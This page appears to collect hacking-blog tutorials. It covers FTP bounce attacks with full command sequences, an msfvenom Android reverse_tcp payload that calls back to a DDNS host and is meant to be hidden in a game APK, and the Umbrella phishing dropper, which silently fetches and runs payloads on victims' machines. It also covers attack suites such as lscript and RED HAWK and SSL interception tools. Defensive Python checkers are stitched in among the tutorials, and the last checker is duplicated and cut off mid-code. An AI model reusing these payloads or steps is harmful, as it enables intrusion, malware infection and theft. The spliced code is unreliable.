JP Morgan – $1B Fine – You Gotta Read This


I mean seriously… the rest of us have to play fair. They were allegedly running a racketeering operation?

Original post: https://shedly.com/5A4je

Social Media Site for Hackers?


How to Hack Internal Private Systems Using FTP Bounce Attack?


Hello hackers, so today we are going to learn how to attack internal private FTP servers through a public server that we exploited earlier, having obtained its FTP login credentials by brute force with Hydra. This method is known as the FTP Bounce attack, because the packets we send bounce through an intermediate public server to the private victim machine.

The motive

You are a user at a foreign site with IP address F.F.F.F and want to retrieve cryptographic source code from crypto.com in the US. The FTP server at crypto.com is set up to allow you to connect, but to deny access to the crypto sources because your source IP address is a non-US site [which the FTP server can determine from a DNS lookup of your address]. In any case, you cannot directly retrieve the source code from crypto.com's server.

However, crypto.com allows ufred.edu to download the crypto sources because ufred.edu is in the US. It happens that you know the incoming directory on ufred.edu is world-writable, so any anonymous user can drop files there and read them back. Let us assume that crypto.com's IP address is C.C.C.C.

FTP Bounce secure connection

The attack

Now assume you have an FTP server that supports passive mode. Open an FTP connection to your own machine's real IP address [not localhost] and log in. Change to a convenient directory that you have write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port returned by the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or switch to another window to proceed with the rest of this.

Construct a file containing FTP server commands. Let's call this file "instrs". It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end consists of extra lines you create, each containing 250 NULs and nothing else, enough to fill up about 60K of extra data.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

crypto.tar.Z should now show up as "foobar" on your machine via your first FTP connection. If the connection to ufred.edu didn't die by itself due to an apparently common server bug, clean up by deleting "instrs" and exiting. Otherwise, you'll have to reconnect to finish.

FTP Bounce Port Scanning
You can use the nmap port scanner in Unix and Windows environments to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

nmap -P0 -b username:password@ftp-server:port <target host>

The listing below shows an FTP bounce port scan launched through the Internet-based FTP server 142.51.17.230 to scan an internal host at 192.168.0.5, a known address previously enumerated through DNS querying.

FTP bounce scanning with nmap

# nmap -P0 -b 142.51.17.230 192.168.0.5 -p21,22,23,25,80

Starting nmap 3.45 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.5):
Port    State   Service
21/tcp  open    ftp
22/tcp  open    ssh
23/tcp  closed  telnet
25/tcp  closed  smtp
80/tcp  open    http

Nmap run completed -- 1 IP address (1 host up) scanned in 12 seconds

Note:
When performing any type of bounce port scan with nmap, you should specify the -P0 option. This stops nmap from probing the target host directly to ascertain whether it is up.

FTP Bounce Exploit Payload Delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to bounce attack, you can then send that information to a specific service port (either on the local host or other addresses). This concept is shown in Figure 8-2.

An illustration of the FTP payload bounce attack

FTP Bounce firewall block

For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writeable directory, and test whether the server is susceptible to the FTP bounce attack. Solaris 2.6 is an excellent example because in its default state it is vulnerable to FTP bounce and RPC service overflow attacks. Binary exploit data isn't the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent unsolicited email this way.

Other possibilities

Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring the realisation of numerous other scary possibilities.

FTP Bounce Description

Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the “ftp-data” problem. For some purposes, this can be the next best thing to source-routed attacks and is likely to succeed where source routeing fails against packet filters. And it’s all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.
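The control that stops this class of abuse is the one implied by the paragraph above: a server must not let a PORT command send data anywhere other than back to the client that issued it. The following Python is an added illustration, not code from the original article or from any FTP server; it parses the RFC 959 h1,h2,h3,h4,p1,p2 form used in the instrs file, enforces the usual anti-bounce policy (data address must equal the control connection's peer, port must be unprivileged) and flags the offending command in a constructed session transcript. The addresses 198.51.100.9 and 203.0.113.7 are documentation placeholders standing in for C.C.C.C and F.F.F.F.

```python
import re

# The six decimal fields of an FTP PORT/PASV address: h1,h2,h3,h4,p1,p2
_PORT_ARG = re.compile(
    r"^\s*(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$"
)


def parse_port_argument(arg):
    """Decode 'h1,h2,h3,h4,p1,p2' into (ip, port) as RFC 959 defines it.
    Returns None when the argument is not well-formed."""
    m = _PORT_ARG.match(arg)
    if not m:
        return None
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        return None
    ip = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]   # p1 is the high byte, p2 the low byte
    return ip, port


def check_port_command(arg, control_peer_ip, min_port=1024):
    """Apply the standard anti-bounce policy an FTP server should enforce on
    PORT: the data address must equal the control connection's peer and the
    port must be unprivileged (>= 1024). Returns (accepted, reason)."""
    parsed = parse_port_argument(arg)
    if parsed is None:
        return False, "malformed PORT argument"
    ip, port = parsed
    if ip != control_peer_ip:
        return False, (f"data address {ip} differs from control peer "
                       f"{control_peer_ip} (bounce attempt)")
    if port < min_port:
        return False, f"data port {port} is privileged (< {min_port})"
    return True, f"accepted {ip}:{port}"


def audit_session(lines, control_peer_ip):
    """Scan the client side of an FTP control-channel transcript and report
    every PORT command the policy would reject as (line_no, command, reason)."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and parts[0].upper() == "PORT":
            ok, reason = check_port_command(parts[1], control_peer_ip)
            if not ok:
                findings.append((n, line.strip(), reason))
    return findings


# Constructed transcript: an anonymous session from 203.0.113.7 that mirrors
# the article's sequence. The first PORT aims the data connection at a third
# party's port 21 (the bounce); the second points back at the client itself.
SAMPLE_SESSION = [
    "USER ftp",
    "PASS -anonymous@",
    "CWD /incoming",
    "STOR instrs",
    "PORT 198,51,100,9,0,21",   # third-party host, port 21: must be rejected
    "RETR instrs",
    "PORT 203,0,113,7,4,1",     # back to the client, port 4*256+1 = 1025: fine
    "RETR crypto.tar.Z",
    "QUIT",
]

if __name__ == "__main__":
    for n, cmd, reason in audit_session(SAMPLE_SESSION, "203.0.113.7"):
        print(f"line {n}: {cmd!r} rejected: {reason}")
```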

If you like this article, kindly rate it and share it. If you have any queries, please comment below and let us know how you felt about the article. To learn how to find devices on the internet to hack into, read the article How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

Thank you.

Any Android Can Be Hacked Over The Internet Using Metasploit Part : 1


Today we'll create a Metasploit payload, embed it into an Android application and use it over the Internet!

First we have to get a DDNS (Dynamic DNS) address to receive the meterpreter session over the internet; so go to the NOIP Dynamic DNS service and create an account there, then configure the DDNS client on your system.

So for Linux distributions:

Once you have opened up your Terminal window you will need to login as the “root” user. You can become the root user from the command line by entering “sudo -s” followed by the root password on your machine.

  1. cd /usr/local/src/
  2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. tar xf noip-duc-linux.tar.gz
  4. cd noip-2.1.9-1/
  5. make install

You will then be prompted to login with your No-IP.com account username and password.

If you get “make not found” or “missing gcc” then you do not have the gcc compiler tools on your machine. You will need to install these in order to proceed.


To Configure the Client

As root again (or with sudo) issue the below command:

/usr/local/bin/noip2 -C

(dash capital C, this will create the default config file)

You will then be prompted for your username and password for No-IP, as well as which hostnames you wish to update. Be careful: one of the questions is "Do you wish to update ALL hosts". If answered incorrectly, this could affect hostnames in your account that are pointing at other locations.

Now the client is installed and configured, you just need to launch it. Simply issue this final command to launch the client in the background:

/usr/local/bin/noip2

Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup. This varies depending on what Linux distribution you are running.

After your DDNS (it'll be something like hostname.ddns.net) is configured, you have to create the Metasploit payload.

Secondly, we have to create an msf payload using msfvenom:
command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=hostname.ddns.net LPORT=4444 R > payload.apk

So the payload will be created.

Thirdly, we have to bind the payload with some other APK file, such as a game or any other application.
For that we should decompile the APK to put the Metasploit hook inside it.
Let's see this in the second (last) part: Part 2.

Do comment below your feedback on this article! Thank You!

How to Hack Using Umbrella Dropper!? A Phishing Tool


Hello hackers, today we are going to learn about Umbrella Dropper, a tool dedicated mostly to pen-testing: it downloads files onto the target system and executes them without requiring a second execution of the .exe, only of the file it is embedded in.

I know most of you might want to hack victims just by sending a real file which, when opened, opens a malicious link that automatically downloads the payload from a remote server and executes it, without the downloaded .exe file needing to be run a second time. You can even hack a victim by simply embedding a malicious backdoor as a zip file inside an image and sending it to the victim; to read about that, follow the article How To Hack Any Windows 7/8/10 Remotely Using An Image.

Well, there are a lot of tools for that, and thanks to GitHub for being an open-source platform where developers and testers share source code and files. GitHub has been a haven for penetration testers and n00bies looking for cool and perilous stuff to generate various payloads, scanners, injectors, etc.

Features

  • Download executable on the target system.
  • Silent execution.
  • Download and execute the executable once only.
  • If the exe has already been downloaded and is running, open only the pdf/docx/xlsx/jpg/png.
  • Some Phishing methods are included.
  • Multiple Session disabled.
  • Bypass UAC.

Needed dependencies

  • apt
  • wine
  • wget
  • Linux
  • sudo access
  • python2.7
  • python 2.7 on Wine Machine

Installation of Umbrella:

  • First, we need to clone [download] the GitHub repository with the command "git clone https://github.com/4w4k3/Umbrella.git".
  • Now change your directory to the downloaded folder: "cd Umbrella".
  • Make the installer file executable with the command "chmod +x install.sh".
  • Run the installer with "./install.sh". This will attempt to install all the dependencies required for the program to run and update your system.

umbrella dropper files

  • To run the script we use "Python.py"; since the script is a Python script, we first tell the terminal that we are running a Python script by prefixing the command with python. We can also run it using "./", which marks it as an executable file on Linux.

umbrella dropper python installation

  • During the installation you will be prompted with a Wine installation pop-up; we just need to specify Windows 7 or XP, and it will attempt to install the Windows .NET Framework, which is needed to create an executable file. Next, it will ask you to install Python; choose the repair option to make the necessary changes to the Python libraries.

umbrella dropper error

Note: If you face any problems with the installation or any error in Python, simply type "python -m pip install --upgrade pip"; this will attempt to upgrade all the Python modules and fix the installation automatically.

Using Umbrella Dropper:

After the installation you will be greeted with the umbrella interface where you will have four options saying:

umbrella dropper interface

  1. [D] GEN DROPPER
  2. [H] HELP
  3. [U] UPDATE
  4. [E] EXIT

umbrella dropper payload options

To generate payload type in D

This time you need to specify the file type you wish to use for the exploit. Next, you need to specify the URL for the .exe file.

Suppose you are running Apache locally: then place the malicious payload [say payload.exe], generated with any payload-generating tool, in your "/var/www/html/" directory, and the URL would be your local "IPaddress/payload.exe". To find your local IP, type "ifconfig" in a terminal. If you are conducting a hack over the WAN, you need to upload the malicious file to a web server publicly accessible from the internet, but for this tutorial I am using my local web server, as shown in the screenshot:

umbrella dropper payload URL

When it asks for the URL, enter the URL of the payload on the server, but remember to check whether the victim can access it; if the victim can't, it is a complete waste of time. Now it will ask you to enter the image URL to use as the transporter; as seen below, I have given the URL in the screenshot:

umbrella dropper transport URL

This will produce a file in the "dist/" directory of the Umbrella folder. Send this to the victim; when he opens the image, the payload gets executed automatically. But if you think like a hacker, we can take advantage of this feature: when the victim opens the file, the web browser opens the embedded link, and since our link points to a payload, it will be downloaded and executed automatically without a second execution of the payload, and we will get a meterpreter session in our terminal. If we select an image the victim likes, found by social engineering him, we can for example embed the payload in an image that is likely to be chosen as a background image and upload it to a file-sharing server; we can also create an album of such background images, infect every image in the album, and send the victim the link to look at the album, and if the victim likes an image and downloads it, our job is done. Umbrella will now do its magic and present us with a meterpreter shell.

But as mentioned, to be a hacker you need not so much to hack as to think like a hacker; finally, it's all up to you to develop ideas about techniques for hacking a victim. If you like this article, kindly rate it above and share it. If you have any queries, comment below to let us know. To learn how to hack Kali Linux, read the article How To Hack The Hacker's OS Kali Linux. Thank you.

How To Hack Anything Using All-In-One lscript Tool ? : Step-By-Step Guide


Hello hackers, hope you guys are doing well. Today's tutorial is for our n00bies and for all those hackers who want all their tools in a single tool so they type less. This "lscript" tool is a script written by Aris Melachroinos which allows you to automate penetration testing or hacking easily. It installs all the best tools available as of 2017 for Kali Linux.

FEATURES:
  • Custom keyboard shortcuts, launch any tool within lscript
  • Enabling/disabling interfaces faster
  • Changing MAC faster
  • Anonymizing yourself faster
  • View your public IP faster
  • View your MAC faster
**TOOLS**
	(This installer installs every tool you need automatically! (except Zatacker))
	Fluxion				by Deltaxflux
	WifiTe				by derv82
	Wifiphisher			by Dan McInerney
	Zatacker			by ???
	Morpheus			by Pedro ubuntu  [ r00t-3xp10it ]
	Osrframework			by i3visio
	Hakku				by 4shadoww
	Trity				by Toxic-ig
	Cupp				by Muris Kurgas
	Dracnmap			by Edo -maland-
	Fern Wifi Cracker		by Savio-code
	Kichthemout			by Nikolaos Kamarinakis & David Schütz
	BeeLogger			by Alisson Moretto - 4w4k3
	Ghost-Phisher			by Savio-code
	Mdk3-master                     by Musket Developer
	Anonsurf                        by Und3rf10w
	The Eye                         by EgeBalci
	Airgeddon                       by v1s1t0r1sh3r3
	Xerxes                          by zanyarjamal
	Ezsploit                        by rand0m1ze
	Katana framework                by PowerScript
	4nonimizer                      by Hackplayers
	Sslstrip2                       by LeonardoNve
	Dns2proxy                       by LeonardoNve
	Pupy                            by n1nj4sec
	Zirikatu                        by pasahitz
	TheFatRat                       by Sceetsec
	Angry IP Scanner                by Anton Keks
	Sniper                          by 1N3
	ReconDog                        by UltimateHackers
	RED HAWK                        by Tuhinshubhra
**Wifi password scripts**
	Handshake       (WPA-WPA2)
	Find WPS pin    (WPA-WPA2)
	WEP hacking     (WEP)

How to Install lscript ?

This tool is available on GitHub; follow these simple steps to install it:

  1. Open up a terminal and navigate to your working directory
  2. Type in the following command: "git clone https://github.com/arismelachroinos/lscript.git". This will clone the GitHub repository into a single folder named lscript.
  3. Now change your directory to the cloned folder using the command "cd lscript".
  4. Type "ls" to see the files present in the working directory. Before running the setup file we need to make it executable; to do this, type "chmod +x install.sh".
  5. Type "./install.sh" to start the installation process. This will attempt to download all the required dependencies and tools from GitHub.

How to use lscript?

  1. Open another terminal and type in “l“, this will start the lazy script.
  2. Now you will be presented with options for:
  • ifconfig
  • Enabling/Disabling Wi-Fi and Monitor mode on wifi
  • Changing/Restoring MAC
  • Starting/disabling Anonymous surf
  • checking the anonymous status
  • view your public IP Address
  • View your MAC ID
  • Tools available with in the script (downloaded/required to be downloaded)
  • Handshakes captured
  • Find WPS pin
  • WEP Hacking
  • MITM attack
  • Metasploit
  • E-Mail Spoofing … as shown in the screenshot:


To check the tools, type "9"; it will list the available options for tools, as shown in the following screenshot. We can see that we have options for:

  • Wi-Fi tools
  • Remote Access
  • Information Gathering
  • Installing /Re installing tool

lscript tool menu

To list all the tools we can install, go into Installing tools; this lists all the tools available to us, as described above and shown in the following screenshot.

lscript tools script

To list the tools available for remote access, we go into Remote Access, where we find the most useful tools for creating payloads to exploit a victim, as seen in the screenshot:

For wifi hacking, we have many tools, as we can see listed in the screenshot:

lscript wifi tools description

So without wasting your time, install these tools to save yourself from typing and be lazy. Hope you like this article; please comment below if you have any queries regarding the tool or any other topic, and do share so that your hacker group can learn about these awesome tools available publicly on the internet. If you wish to know how to hack Kali Linux, read the article How To Hack The Hacker's OS Kali Linux, and if you want to hack your friend within the network, follow the article How To Hack With Xerosploit.

Thank you.

RED HAWK: Multiple Scanning And Attack Vector


Hello friends, today we are going to learn about a tool called RED HAWK, which can be used to gather information about a target and determine crucial details about the company's hosting, location, protocols used, etc. These come under information gathering, which is the most crucial phase for any hacker or pentester performing or simulating a hack. Information gathering mainly consists of:

  • Network architecture
  • Connected devices
  • Open ports
  • Running services
  • Known vulnerabilities
  • Password profiling,etc……

There are many information gathering tools available on GitHub and across the internet; one of them is RED HAWK.

RED HAWK is one of the best information gathering tools written in PHP. It's an all-in-one tool capable of information gathering (using WHOIS lookup, WordPress detection, Reverse IP scanning, etc.), SQL vulnerability scanning and crawling.

To know more about information gathering, visit this page: Information Gathering

Features Of The Tool:

  • Server detection
  • CloudFlare detector
  • robots scanner
  • CMS Detector
      • WordPress
      • Joomla
      • Drupal
      • Magento
  • Whois
  • GEO-IP Scan
  • NMAP Port Scan
  • DNS Lookup
  • SubNet Calculator
  • Subdomain Finder
  • Reverse IP Scanner
  • CMS detection for sites on the same server
  • Parameter Finder
  • Error based SQLi Detector
  • Crawler
      • Basic Crawler {69}
          • Admin scanner
          • Backups Finder
          • Misc. Crawler
      • Advance Crawler {420}
          • Admin scanner
          • Backups Finder
          • Misc. Crawler

To get RED HAWK we need to clone it from GitHub or download the zip file from GitHub.

The Installation:

  1. Open up a terminal and type "git clone https://github.com/Tuhinshubhra/RED_HAWK.git".

This will clone the git repository and place all its files into a directory named RED_HAWK in your working directory.

If you have downloaded the zip, just extract it and open a terminal in the extracted folder.

  2. Now change your directory to the RED_HAWK folder using the command "cd RED_HAWK".
  3. We can list the available files in the folder using the "ls" command. To run RED HAWK, type "php rhawk.php".
  4. You will get the RED HAWK interface. Type "help" to list the available options. NOTE: if you face any error running the tool, type "fix"; this will install all required modules.
  5. Type in the domain name you want to scan (without http:// or https://). For example, we are setting facebook.com as the target.
  6. Select whether the site runs on HTTPS or not. If it does, it is preferable to select HTTPS for better scanning and results.

NOTE: if the scanner stops working after CloudFlare detection, use the fix command or manually install php-curl and php-xml.

As seen in the screenshot below, it runs an nmap scan to identify services on ports and find open ports, gathering information about the operating system, firewall, traceroute, etc. To know more about nmap scanning, please read the article All Nmap tool commands at your fingertips!

It also does a DNS scan of our target to look for DNS vulnerabilities and displays the subnet available for the target we selected; as we can see, we get information showing that Facebook uses the IPv6 protocol.

This tool also determines the geographical location of our target, similar to the results from Shodan; to learn about Shodan, read the article How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

As mentioned, this tool does more than we can imagine. It makes our work easier by automating all the required tasks of information gathering, covering each and every point of interest regarding our target.

Hope you enjoyed reading this article. If you did, kindly share it to let your hacker friend(s) know that there is a tool which can make their information gathering simpler and easier, giving them plenty of time to plan the attack. If you have any queries regarding the article, comment below and let us know how you felt reading it. Thank you.

How To Hack Any SSL-Protected (https) Website Using SSLScan ? : Step-By-Step Guide


Ever wondered what the consequences would be if the link established between a web server and a browser were not encrypted or secured? Many attacks could happen! That is why Secure Sockets Layer (SSL) is used.

From this we might assume that SSL is very secure and hard to hack! But that is no longer the case!

Want to know how to hack websites that are even protected by SSL? Then you shouldn't miss this article. Let's get into it.

Attacking Secure Sockets Layer

Secure Sockets Layer (SSL) and Transport Layer Security (TLS), are cryptographic protocols used to provide secure communications across the Internet.

These protocols have been widely used in secure applications like the Internet messaging and e-mail, web browsing, and voice-over-IP.

These protocols are used across the Internet; they were introduced in the mid-1990s and are increasingly coming under attack. SSL Version 2.0 (Version 1.0 was never publicly released) contains a significant number of flaws that can be exploited, such as poor key control, and is vulnerable to man-in-the-middle attacks.

Although most users use Version 3.0 protocol and its newer versions of TLS, a misconfiguration can still lead to vulnerability.

Configuring Kali for SSLv2 scanning

Before beginning, verify that Kali has been configured to scan for SSL 2 protocols.

From a terminal window, enter the following command:

root@kali:~# openssl s_client -connect www.opensecurityresearch.com:443 -ssl2

If this returns an unknown option -ssl2 error, then the additional configuration will be required.

To fix it, follow these steps carefully:

  1. Install quilt, a program used to manage multiple patches to an application's source code, using the following command:

root@kali:~# apt-get install devscripts quilt

  2. Download the openssl source code, apply the patches, update the configuration files, and then rebuild the application. Use the following commands:

root@kali:~# apt-get source openssl

root@kali:~# cd openssl-1.0.1e

root@kali:~/openssl-1.0.1e# quilt pop -a

  3. Edit the /openssl-1.0.1e/debian/patches/series file, and delete the following line:

ssltest_no_sslv2.patch

  4. Edit the /openssl-1.0.1e/debian/rules file, delete the no-ssl2 argument, and apply the patches to openssl. Use the following commands:

root@kali:~/openssl-1.0.1e# quilt push -a

root@kali:~/openssl-1.0.1e# dch -n 'Allow SSLv2'

  5. After completing this, rebuild the openssl package and then reinstall it. This step can be performed with the following commands:

root@kali:~/openssl-1.0.1e# dpkg-source --commit

root@kali:~/openssl-1.0.1e# debuild -uc -us

root@kali:~/openssl-1.0.1e# cd /root

root@kali:~# dpkg -i *ssl*.deb

  6. Confirm that the patches have been applied successfully by reissuing the command to connect using SSLv2, as shown in the following screenshot:

Kali scripts that rely on openssl, particularly sslscan, will need to be recompiled. To recompile, first, download the source and then rebuild it. When this is complete, reinstall it using the following commands:


root@kali:~# apt-get source sslscan

root@kali:~# cd sslscan-1.8.2

root@kali:~/sslscan-1.8.2# debuild -uc -us

root@kali:~/sslscan-1.8.2# cd /root

root@kali:~# dpkg -i *sslscan*.deb

Reconnaissance of SSL connections

The reconnaissance phase remains important when assessing SSL connectivity, especially when reviewing the following items:

  • The X.509 certificate, which is used to identify the systems involved in establishing the connection
  • The type of encryption being used
  • The configuration information

The SSL certificate can provide information that can be used for a social engineering attack. An attacker must check whether the certificate is valid or not. Certificates that are invalid may cause an error in the signature.

If the user had previously accepted an invalid certificate, then the victim might accept a new invalid certificate as well, making the attacker's job easy.

The type of encryption used to secure an SSL connection is basically divided into the following categories:

  • Null cyphers: These cyphers are used to verify the authenticity of a transmission. Because no encryption is applied, they do not provide any security.
  • Weak cyphers: These are cyphers with a key length of 128 bits or less. Cyphers that use the Diffie-Hellman algorithm for key exchange can also be considered weak since they are vulnerable to man-in-the-middle attacks.
  • Strong cyphers: These are cyphers that exceed 128 bits. Currently, the most secure option is AES encryption with a 256-bit key.

SSL and TLS rely on cypher suites to establish a secure connection. There are more than 30 such suites, and the complexity of selecting the best option results in users defaulting to less secure options. Therefore, each SSL and TLS connection must be tested.

To conduct reconnaissance against SSL connections, use the NSE modules of nmap or SSL-specific applications. The nmap NSE modules and their functions are listed below:

  • ssl-cert: Retrieves the server's SSL certificate. The amount of information returned depends on the verbosity level (none, -v, and -vv).
  • ssl-date: Retrieves a target host's date and time from its TLS ServerHello response.
  • ssl-enum-ciphers: Repeatedly initiates SSL and TLS connections, each time trying a new cypher and recording whether the host accepts or rejects it. Cyphers are shown with a strength rating. This is a highly intrusive scan and may be blocked by the target.
  • ssl-google-cert-catalog: Queries Google's Certificate Catalogue for information that pertains to the SSL certificate retrieved from the target. It provides information on how recently, and for how long, Google has been aware of the certificate. If a certificate is not recognised by Google, it may be suspicious/false.
  • ssl-known-key: Checks whether the SSL certificate used by a host has a fingerprint that matches databases of compromised or faulty keys. Presently, it uses the LittleBlackBox database. However, any database of fingerprints can be used.
  • sslv2: Determines whether the server supports the obsolete and less secure SSL Version 2 and which cyphers are supported.

To invoke a single script from the command line, use the following command:


root@kali:~# nmap --script <script name> -p 443 <Target IP>

In the following example, the ssl-cert script was invoked with the -vv option for maximum verbosity. The data returned by this script is shown in the following screenshot.

During reconnaissance, an attacker can launch all SSL modules using the following command:


root@kali:~# nmap --script "ssl*" <IP address>

Kali's attack tools that are specific to SSL can be invoked from the command line or selected from the menu by navigating to Kali Linux | Information Gathering | SSL Analysis. The tools are listed below:

  • sslcaudit: Automates the testing of SSL and TLS clients to determine their resistance against man-in-the-middle attacks.
  • ssldump: Conducts network protocol analysis of SSLv3 and TLS communications. If provided with the appropriate encryption key, it will decrypt SSL traffic and display it in the clear.
  • sslscan: Queries SSL services to determine which cyphers are supported. Output includes the preferred SSL cyphers and is displayed in text and XML formats.
  • sslsniff: Enables man-in-the-middle attack conditions on all SSL connections over a particular LAN, dynamically generating certificates on the fly for the domains being accessed.
  • sslsplit: Performs man-in-the-middle attacks against SSL and TLS networks. Connections are transparently intercepted through a network address translation engine and redirected to sslsplit, which terminates the original connection and initiates a new connection to the original destination while logging all the transmitted data. It supports plain TCP, SSL, HTTP/HTTPS, and IPv4 and IPv6.
  • sslstrip: Designed to transparently hijack the HTTP traffic on a network, watch for HTTPS links, and redirect and then map these links to spoofed HTTP or HTTPS links. It also supports modes to supply a favicon that looks like a lock icon as well as selective logging of intercepted communications.
  • sslyze: Analyses the SSL configuration of a server.
  • tlssled: Unifies the use and output of several other SSL-specific applications; checks for encryption strength, certificate parameters, and renegotiation capabilities.

The most commonly used is sslscan, which queries SSL services to determine the certificate details and the associated cyphers. The output is in text or XML format. When testing a particular connection, use the --no-failed option, as in the screenshot, to have sslscan show only the accepted cypher suites.
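To triage sslscan output against the cypher categories given earlier, here is an added Python example; it is not from the original article or from the sslscan project. It parses constructed sslscan 1.x style result lines, classifies each accepted suite as null, weak or strong using the article's key-length rule, and additionally flags SSLv2/SSLv3 and anonymous Diffie-Hellman (ADH/AECDH) suites, the unauthenticated DH variants that a man-in-the-middle can intercept. The SAMPLE_OUTPUT block is constructed, not a real scan.

```python
import re

# One sslscan 1.x result line looks like:
#   "    Accepted  SSLv3  256 bits  DHE-RSA-AES256-SHA"
_RESULT = re.compile(
    r"^\s*(Accepted|Rejected|Failed)\s+(SSLv2|SSLv3|TLSv1(?:\.\d)?)\s+(\d+)\s+bits\s+(\S+)"
)


def classify_cipher(name, bits):
    """Map a suite to the article's categories: null (no encryption), weak
    (<= 128-bit key) or strong (> 128-bit key). Anonymous DH suites (ADH/AECDH)
    are placed in 'weak' because they carry no server authentication."""
    if bits == 0 or "NULL" in name.upper():
        return "null"
    if name.upper().startswith(("ADH-", "AECDH-")) or bits <= 128:
        return "weak"
    return "strong"


def parse_sslscan(text):
    """Return a list of dicts for every cipher result line in sslscan text output."""
    results = []
    for line in text.splitlines():
        m = _RESULT.match(line)
        if not m:
            continue
        results.append({
            "status": m.group(1),
            "protocol": m.group(2),
            "bits": int(m.group(3)),
            "cipher": m.group(4),
        })
    return results


def audit_sslscan(text):
    """Return (protocol, cipher, reason) for each accepted suite a defender
    should remove: obsolete protocol, or a null/weak cipher."""
    findings = []
    for r in parse_sslscan(text):
        if r["status"] != "Accepted":       # only what the server agreed to
            continue
        reasons = []
        if r["protocol"] in ("SSLv2", "SSLv3"):
            reasons.append(f"obsolete protocol {r['protocol']}")
        category = classify_cipher(r["cipher"], r["bits"])
        if category != "strong":
            reasons.append(f"{category} cipher {r['cipher']} ({r['bits']} bits)")
        if reasons:
            findings.append((r["protocol"], r["cipher"], "; ".join(reasons)))
    return findings


# Constructed sslscan-style output for a badly configured server (not a real scan).
SAMPLE_OUTPUT = """\
  Supported Server Cipher(s):
    Rejected  SSLv2  168 bits  DES-CBC3-MD5
    Accepted  SSLv2  128 bits  RC4-MD5
    Accepted  SSLv3  256 bits  AES256-SHA
    Accepted  SSLv3  0 bits    NULL-SHA
    Accepted  TLSv1  256 bits  ADH-AES256-SHA
    Accepted  TLSv1  128 bits  AES128-SHA
    Accepted  TLSv1  256 bits  DHE-RSA-AES256-SHA
"""

if __name__ == "__main__":
    for proto, cipher, reason in audit_sslscan(SAMPLE_OUTPUT):
        print(f"{proto:<6} {cipher:<22} {reason}")
```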

The sslyze Python tool analyses the server’s SSL configuration and validates the certificate, tests for weak cypher suites, and identifies the configuration information that may support additional attacks.

Another SSL reconnaissance tool is tlssled.
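As an added example (not part of the original article, and not code from sslscan or sslyze), here is a small Python checker for the "Accepted ..." lines that sslscan prints: it flags accepted cypher suites that use a deprecated protocol, a weak primitive, a short key, or no forward secrecy, which is the review you would do on a scan of your own server. The sample lines are constructed and only approximate sslscan's plain-text format with colour output disabled.

```python
import re
from dataclasses import dataclass

# Constructed sample in the style of sslscan's text output
# ("Accepted <protocol> <bits> bits <suite>"). Not real output from any host.
SAMPLE_SSLSCAN_OUTPUT = """\
Accepted  SSLv3     128 bits  RC4-SHA
Accepted  TLSv1.0   168 bits  DES-CBC3-SHA
Accepted  TLSv1.2   128 bits  ECDHE-RSA-AES128-GCM-SHA256
Accepted  TLSv1.2   256 bits  ECDHE-RSA-AES256-GCM-SHA384
Accepted  TLSv1.2   256 bits  AES256-SHA
Accepted  TLSv1.3   256 bits  TLS_AES_256_GCM_SHA384
"""

DEPRECATED_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
# Suite-name fragments that indicate a weak or anonymous primitive.
WEAK_MARKERS = ("RC4", "DES", "NULL", "EXPORT", "EXP-", "MD5", "ADH", "AECDH", "ANON")

# Trailing fields (curve, DHE size) after the suite name are ignored.
LINE_RE = re.compile(r"^Accepted\s+(\S+)\s+(\d+)\s+bits\s+(\S+)")


@dataclass
class Finding:
    protocol: str
    suite: str
    reasons: tuple


def assess_suite(protocol, bits, suite):
    """Return the reasons an accepted suite is a concern (empty list = fine)."""
    reasons = []
    if protocol in DEPRECATED_PROTOCOLS:
        reasons.append(f"deprecated protocol {protocol}")
    if bits < 128:
        reasons.append(f"key length {bits} bits")
    for marker in WEAK_MARKERS:
        if marker in suite.upper():
            reasons.append(f"weak component {marker}")
            break
    # TLS 1.3 suites always use an ephemeral key exchange; older suites must
    # name (EC)DHE explicitly to give forward secrecy.
    if protocol != "TLSv1.3" and "DHE" not in suite:
        reasons.append("no forward secrecy")
    return reasons


def parse_sslscan(text):
    """Parse accepted-suite lines and keep only the ones with findings."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, bits, suite = m.group(1), int(m.group(2)), m.group(3)
        reasons = assess_suite(proto, bits, suite)
        if reasons:
            findings.append(Finding(proto, suite, tuple(reasons)))
    return findings


if __name__ == "__main__":
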